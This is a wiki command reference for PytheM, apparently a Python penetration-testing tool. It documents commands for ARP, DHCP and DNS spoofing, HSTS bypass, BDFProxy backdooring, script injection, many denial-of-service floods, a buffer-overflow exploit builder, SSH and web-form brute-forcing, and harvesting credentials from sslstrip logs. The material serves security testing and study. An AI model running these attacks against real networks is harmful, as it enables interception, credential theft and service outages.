Skip to content

Commands Reference

m4n3dw0lf edited this page Nov 28, 2016 · 83 revisions

Commands Reference

SECTION - CORE

  • help: Print the help message.

  • exit/quit: Leave the program.

  • set: Set a variable's value.

arguments:

  • interface
  • gateway
  • target
  • file
  • arpmode
  • domain
  • redirect
  • script
  • filter

examples:

   pythem> set interface
   [+] Enter the interface:
             or
   pythem> set interface wlan0
  • print: Print a variable's value.

    examples:

   pythem> print gateway

SECTION - NETWORK, MAN-IN-THE-MIDDLE AND DENIAL OF SERVICE (DOS)

  • scan: Make a tcp(significant-ports)/manual(port)/arp(layer-2) scan.

Should be called after setting interface and target

Targets can be IP addresses or network ranges with CIDR

arguments:

  • tcp
  • arp
  • manual

examples:

   pythem> scan
   [*] Select one scan mode, options = tcp/arp/manual
   [+] Scan mode: arp
	   or
   pythem> scan tcp

   pythem> scan manual
   [+] Enter the port, ports (separated by commas): 21,22,25,80
  • arpspoof: Start or stop an arpspoofing attack.

Optional setting arpmode to select arpspoofing mode, should be filled with rep or req

rep to spoof responses, req to spoof requests

arguments:

  • start
  • stop
  • status
  • help

examples:

   pythem> arpspoof start
   pythem> arpspoof stop
   pythem> arpspoof status

  • dhcpspoof: Start a DHCP ACK Injection spoofing attack.

If the real DHCP server ACK is faster than your host the spoofing will not work, check it with the sniffer

arguments:

  • start
  • stop
  • status
  • help

example:

   pythem> dhcpspoof start
  • dnsspoof: Start a dnsspoofing attack.

Should be called after an arpspoofing attack has been started

arguments:

  • start
  • stop
  • status
  • help

examples:

   pythem> dnsspoof start
   pythem> dnsspoof stop
   pythem> dnsspoof status

  • hstsbypass: Start sslstrip+ and dns2proxy

SSLstrip+ by: LeonardoNve && M.Marlinspike

DNS2Proxy by: LeonardoNve

Should be called after an ARP spoofing attack has been started

example:

   pythem> arpspoof start
   pythem> hstsbypass
  • bdfproxy: Start BDFProxy and Metasploit combo.

BDFProxy by: JoshuaPitts

Metasploit by: Rapid7

Should be called after an ARP spoofing attack has been started

example:

   pythem> arpspoof start
   pythem> bdfproxy
  • inject: Start a web server with a script to inject

Should be used after a arpspoof has been started

arguments:

  • start
  • stop
  • status
  • help

examples:

   pythem> inject start
   pythem> inject stop
  • sniff: Start sniffing packets.

Should be called after setting an interface

sniff custom filters:

  • http
  • dns
  • core | You need to try this!

All filters or none filter pass through the PytheM custom filter to minimize redundancy.

examples:

   pythem> sniff http
	  or
   pythem> sniff
   [+] Enter the filter: port 1337 and host 10.0.1.5  (tcpdump-like format)
  • dos: Start a Denial of Service attack (DOS).

arguments:

  • dnsdrop > Start to drop DNS queries that pass through man-in-the-middle traffic.

ARP spoofing need to be initialized to block the network of the target IP address or Range.

  • synflood > Start a SYN flood attack on target host, default port = 80, set port to change.
  • udpflood > Start a UDP flood attack on target host, default port = 80, set port to change.
  • teardrop > Start a UDP teardrop fragmentation attack.
  • land > Start a LAND attack on target address, default port = 80, set port to change.
  • icmpflood > Start a ICMP flood attack on target host.
  • pingofdeath > Start a ping of death (P.O.D) attack on target address.
  • icmpsmurf > Start a ICMP smurf attack on target host. send echo-requests with target address as source.
  • dhcpstarvation > Start a DHCP starvation attack on network DHCP server. Multiple spoofed MAC dhcp discovers.
  • dnsamplification > Start a DNS amplification attack on target address with given DNS servers to amplificate.

examples:

   pythem> dos dnsdrop help

   pythem> dos synflood
  • pforensic: Start a packet-analyzer

Should be called after setting file with a .pcap file

examples:

   pythem> pforensic
   pforensic> help

PFORENSIC COMMANDS REFERENCE

  • help: Print the help message

  • clear: Clean the screen, same as GNU/Linux OS "clear"

  • exit/quit: Return to pythem

  • show: Display all the packets and their index numbers.

  • conversations: Display pictogram with conversations between hosts from the analyzed file.

  • packetdisplay [num]: Display the full content of index selected packet.

  • filter [string/layer]: Run a custom filter in the packets.

SECTION - EXPLOIT DEVELOPMENT AND REVERSE ENGINEERING

  • xploit: Interactive stdin or tcp exploit development shell

The stdin argument should be called after setting file

The tcp argument should be called after setting target

arguments:

  • stdin
  • tcp

examples:

   pythem> set file ./exec

   pythem> xploit stdin
           or
   pythem> xploit
   [*] Select one xploit mode, options = stdin/tcp
   [+] Exploit mode:

   xploit> help

XPLOIT COMMANDS REFERENCE

  • help: Print this help message.

  • clear: Clean the screen, same as GNU/Linux OS "clear".

  • exit/quit: Return to pythem.

  • set: Set the variables values.

parameters:

  • offset > Number os 'A's to overwrite the instruction pointer.

  • addr1 > (Optional) Hexa(0xaddress) First address to overwrite after the offset.

  • addr2 > (Optional) Hexa(0xaddress) Second address to overwrite after the offset.

  • nops > (Optional) Number of NOPs after IP overwrite or after the addr1 and addr2 if they are set.

  • shellcode > (Optional) Shellcode (could be generated by msfvenom or any other).

  • lenght > Total lenght of the payload.

  • arch > Target system processor architecture.

  • print: Print a variable's value.

    example:

   xploit> print offset
  • decode/encode: Decode or encode a string with a chosen pattern.

    examples:

   xploit> decode hex
   xploit> encode hex
  • search: Automatically search for instructions or opcode in the binary executable.

parameters:

  • instructions

  • opcode

examples:

   xploit> search
   [+] Search (instructions/opcode):
                 or
   xploit> search instructions			? - any character
   [+] Find: pop ?di				    % - any character

   xploit> search opcode
   [+] Find: ffe4
  • xploit: Run the exploit after all the settings.

    example:

   xploit> xploit
  • fuzz: Start fuzzing on subject.

If file is passed to xploit will fuzz stdin

If target is passed to xploit will fuzz tcp

The offset's value will be the number of 'A's to send.

[Default = 1]
will be increased in 1 by 1.
example:
 [offset = 10]
 will be increased in 10 by 10.

examples:

   xploit> fuzz

Anything else will be executed in GNU debugger shell with the target file

SECTION - BRUTE-FORCE

  • brute: Start a brute-force attack.

Should be called after setting a target and a word-list file path

arguments:

  • ssh > ip address as target
  • url > url (with http:// or https://) as target
  • form > url (with http:// or https://) as target

examples:

   pythem> brute form
   pythem> brute ssh

SECTION - UTILS

  • geoip: Approximately geolocate the location of an IP address.

Should be called after setting target (ip address)

examples:

   pythem> geoip
	  or
   pythem> geoip 8.8.8.8 (without setting target)
  • harvest: Harvest credentials inside file that was set, default file: sslstrip.log

    example:

   pythem> harvest
  • decode/encode: Decode or encode a string with a chosen pattern

    examples:

   pythem> decode base64
   [*] String to be decoded:
            or
   pythem> encode hex
   [*] String to be encoded:
  • cookiedecode: Decode a base64 url encoded cookie value.

    example:

   pythem> cookiedecode

Anything else will be executed in the terminal like ls, nano, cat, etc.

Clone this wiki locally